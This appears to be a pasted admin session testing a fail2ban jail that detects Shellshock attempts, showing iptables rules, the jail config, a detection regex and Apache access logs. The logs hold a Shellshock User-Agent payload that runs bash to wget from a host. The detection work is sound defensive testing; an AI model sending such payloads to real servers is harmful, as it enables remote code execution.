Untitled

a guest
Nov 24th, 2015
```
# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
fail2ban-ssh tcp -- anywhere anywhere multiport dports ssh

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Chain fail2ban-ssh (1 references)
target prot opt source destination
RETURN all -- anywhere anywhere

# fail2ban-client status apache-vulnerability-scan
Status for the jail: apache-vulnerability-scan
|- filter
| |- File list: /var/log/apache2/other_vhosts_access.log /var/log/apache2/access.log
| |- Currently failed: 0
| `- Total failed: 7
`- action
|- Currently banned: 1
| `- IP list: 10.0.2.2
`- Total banned: 1

# cat /etc/fail2ban/jail.local
[apache-vulnerability-scan]

enabled = true
port = http,https
filter = apache-vulnerability-scan
logpath = /var/log/apache*/*access.log
maxretry = 1
banaction = iptables-multiport
findtime = 600
bantime = 600

# fail2ban-regex -v /var/log/apache2/access.log /etc/fail2ban/filter.d/apache-vulnerability-scan.conf

Running tests
=============

Use failregex file : /etc/fail2ban/filter.d/apache-vulnerability-scan.conf
Use log file : /var/log/apache2/access.log


Results
=======

Failregex: 7 total
|- #) [# of hits] regular expression
| 1) [7] ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$
| 10.0.2.2 Tue Nov 24 19:49:24 2015
| 10.0.2.2 Tue Nov 24 19:49:35 2015
| 10.0.2.2 Tue Nov 24 19:49:36 2015
| 10.0.2.2 Tue Nov 24 19:49:46 2015
| 10.0.2.2 Tue Nov 24 19:49:48 2015
| 10.0.2.2 Tue Nov 24 19:49:49 2015
| 10.0.2.2 Tue Nov 24 19:49:50 2015
`-

Ignoreregex: 0 total

Date template hits:
|- [# of hits] date format
| [7] Day/MONTH/Year:Hour:Minute:Second
| [0] WEEKDAY MONTH Day Hour:Minute:Second[.subsecond] Year
| [0] WEEKDAY MONTH Day Hour:Minute:Second Year
| [0] WEEKDAY MONTH Day Hour:Minute:Second
| [0] MONTH Day Hour:Minute:Second
| [0] Year/Month/Day Hour:Minute:Second
| [0] Day/Month/Year Hour:Minute:Second
| [0] Day/Month/Year2 Hour:Minute:Second
| [0] Month/Day/Year:Hour:Minute:Second
| [0] Year-Month-Day Hour:Minute:Second[,subsecond]
| [0] Year-Month-Day Hour:Minute:Second
| [0] Year.Month.Day Hour:Minute:Second
| [0] Day-MONTH-Year Hour:Minute:Second[.Millisecond]
| [0] Day-Month-Year Hour:Minute:Second
| [0] Month-Day-Year Hour:Minute:Second[.Millisecond]
| [0] TAI64N
| [0] Epoch
| [0] ISO 8601
| [0] Hour:Minute:Second
| [0] <Month/Day/Year@Hour:Minute:Second>
| [0] YearMonthDay Hour:Minute:Second
| [0] Month-Day-Year Hour:Minute:Second
`-

Lines: 7 lines, 0 ignored, 7 matched, 0 missed

# cat /var/log/apache2/access.log
10.0.2.2 - - [24/Nov/2015:03:49:24 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [24/Nov/2015:03:49:35 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [24/Nov/2015:03:49:36 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [24/Nov/2015:03:49:46 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [24/Nov/2015:03:49:48 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [24/Nov/2015:03:49:49 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
10.0.2.2 - - [24/Nov/2015:03:49:50 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
```